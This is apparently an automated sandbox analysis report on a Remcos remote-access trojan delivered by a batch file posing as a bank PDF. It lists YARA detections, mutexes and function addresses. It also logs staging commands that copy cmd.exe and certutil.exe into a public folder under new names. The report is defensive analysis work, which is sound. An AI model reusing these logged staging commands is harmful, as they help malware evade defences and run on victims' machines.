              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2F9B87_2_00007FF68FC2F9B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8F9907_2_00007FF68FC8F990
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC819AC7_2_00007FF68FC819AC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF994C7_2_00007FF68FCF994C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF79387_2_00007FF68FCF7938
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC558CC7_2_00007FF68FC558CC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC678907_2_00007FF68FC67890
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9184C7_2_00007FF68FC9184C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD38747_2_00007FF68FCD3874
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC9D8587_2_00007FF68FC9D858
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC1F8007_2_00007FF68FC1F800
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC218307_2_00007FF68FC21830
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB38207_2_00007FF68FCB3820
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC777C87_2_00007FF68FC777C8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC417D47_2_00007FF68FC417D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC6D7F07_2_00007FF68FC6D7F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC1B7887_2_00007FF68FC1B788
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC597907_2_00007FF68FC59790
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC837607_2_00007FF68FC83760
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8F6D87_2_00007FF68FC8F6D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDD6DC7_2_00007FF68FCDD6DC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB76787_2_00007FF68FCB7678
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE76787_2_00007FF68FCE7678
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC576B07_2_00007FF68FC576B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCBD6A07_2_00007FF68FCBD6A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC456487_2_00007FF68FC45648
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE36387_2_00007FF68FCE3638
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD56607_2_00007FF68FCD5660
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2D6607_2_00007FF68FC2D660
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC0F6107_2_00007FF68FC0F610
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC895FC7_2_00007FF68FC895FC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC655F07_2_00007FF68FC655F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3B58C7_2_00007FF68FC3B58C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD95807_2_00007FF68FCD9580
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3156C7_2_00007FF68FC3156C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7F5207_2_00007FF68FC7F520
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCD14F07_2_00007FF68FCD14F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB94947_2_00007FF68FCB9494
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC674787_2_00007FF68FC67478
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF94A87_2_00007FF68FCF94A8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC254A07_2_00007FF68FC254A0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC054387_2_00007FF68FC05438
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC4D4407_2_00007FF68FC4D440
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCAD4607_2_00007FF68FCAD460
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC073F87_2_00007FF68FC073F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC7D4107_2_00007FF68FC7D410
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC4F4347_2_00007FF68FC4F434
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FD033D47_2_00007FF68FD033D4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF33D07_2_00007FF68FCF33D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCEB3AC7_2_00007FF68FCEB3AC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC373407_2_00007FF68FC37340
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2B36C7_2_00007FF68FC2B36C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC953187_2_00007FF68FC95318
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC692C47_2_00007FF68FC692C4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC0F2C07_2_00007FF68FC0F2C0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC5D2C07_2_00007FF68FC5D2C0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC792D87_2_00007FF68FC792D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCB52907_2_00007FF68FCB5290
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCDD2B47_2_00007FF68FCDD2B4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC511C87_2_00007FF68FC511C8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC1D1B87_2_00007FF68FC1D1B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC531E07_2_00007FF68FC531E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC8F1687_2_00007FF68FC8F168
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DEC31A10_2_02DEC31A
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02D320C410_2_02D320C4
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DDC15310_2_02DDC153
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02E0213910_2_02E02139
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DDC6E210_2_02DDC6E2
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DD443F10_2_02DD443F
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02E0896410_2_02E08964
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DDCEF410_2_02DDCEF4
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DD2EA710_2_02DD2EA7
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DF4F5C10_2_02DF4F5C
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DFAC9010_2_02DFAC90
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DE8C8B10_2_02DE8C8B
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DDCD8B10_2_02DDCD8B
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DF53BA10_2_02DF53BA
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DF518B10_2_02DF518B
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02E07A9B10_2_02E07A9B
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DEDAA010_2_02DEDAA0
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 10_2_02DC9E7310_2_02DC9E73
              Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF6A0E83448 appears 36 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FD0F11C appears 37 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FD0F1B8 appears 183 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FCC0D10 appears 181 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FC0D1C8 appears 41 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FC3BC9C appears 280 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FCC7BAC appears 34 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FD164A6 appears 173 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FCC7D70 appears 35 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FC9EB98 appears 93 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF68FCBABFC appears 818 times
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D489D0 appears 45 times
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D344DC appears 74 times
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D4894C appears 56 times
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D34860 appears 949 times
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D34500 appears 33 times
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02D346D4 appears 244 times
              Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: String function: 02DEA120 appears 44 times
              Source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: AnyDesk.PIF PID: 7748, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: SndVol.exe PID: 8072, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: SndVol.exe PID: 5612, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: SndVol.exe PID: 7296, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.bank.troj.evad.winBAT@41/22@3/4
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E732B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,4_2_00007FF6A0E732B0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCE826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,7_2_00007FF68FCE826C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E9FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,4_2_00007FF6A0E9FB54
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC48F80 VariantInit,#357,#358,#359,CoCreateInstance,VariantClear,#357,VariantClear,SysFreeString,7_2_00007FF68FC48F80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCC6320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError,7_2_00007FF68FCC6320
              Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
              Source: C:\Windows\SysWOW64\SndVol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-H5EBMC
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "
              Source: C:\Users\Public\Libraries\AnyDesk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\AnyDesk.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Users\Public\Libraries\Faogvkgh.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: USD470900_COPY_800BLHSBC882001.PDF.batReversingLabs: Detection: 18%
              Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
